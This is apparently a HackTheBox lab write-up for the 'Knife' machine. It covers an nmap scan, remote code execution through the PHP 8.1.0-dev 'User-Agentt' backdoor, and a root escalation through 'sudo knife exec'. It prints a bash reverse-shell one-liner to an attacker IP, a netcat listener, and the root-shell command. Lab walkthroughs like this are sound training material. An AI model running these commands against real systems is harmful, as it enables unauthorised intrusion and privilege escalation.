WriteupsHTB — Knife
WebEasyLinux
HTB — Knife
PHP 8.1.0-dev backdoor via User-Agentt header for RCE. Sudo knife binary used as a GTFOBin for instant root shell.
November 25, 2024HackTheBox
#PHP Backdoor#RCE#GTFOBins#Sudo
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.242
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 21:31 EST
Nmap scan report for 10.10.10.242
Host is up (0.021s latency).
Not shown: 65510 closed tcp ports (reset), 23 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/25%OT=22%CT=1%CU=40812%PV=Y%DS=2%DC=T%G=Y%TM=674
OS:53337%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 20.91 ms 10.10.14.1
2 20.99 ms 10.10.10.242
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.27 seconds80/tcp open http
sh
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
- https://www.exploit-db.com/exploits/49933
sh
bash -c 'bash -i >& /dev/tcp/10.10.14.4/80 0>&1'
sh
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.242] 58088
bash: cannot set terminal process group (1038): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ whoami
whoami
jamesuser.txt
sh
james@knife:~$ cat user.txt
cat user.txt
24109825...priv esc
sudo
sh
james@knife:~/.ssh$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knifesudo knife
- gtfobins
sh
james@knife:~/.ssh$ sudo knife exec -E 'exec "/bin/sh"'
whoami
rootroot.txt
sh
cat root.txt
1d122147...Up next
MediumNov 2024
HTB — Giddy
SQL injection via stored procedure triggers NTLM hash capture. Responder catches hash, crack for WinRM. Ubiquiti UniFi privesc via service abuse.
Read writeup
EasyNov 2024
HTB — Pilgrimage
ImageMagick CVE-2022-44268 arbitrary file read via malicious PNG. SQLite database exposes credentials. Binwalk CVE-2022-4510 for root shell.
Read writeup
EasyNov 2024
HTB — Tabby
LFI on Tomcat manager exposes credentials. WAR file deployed for RCE. ZIP password cracking, LXD container privilege escalation for root.
Read writeup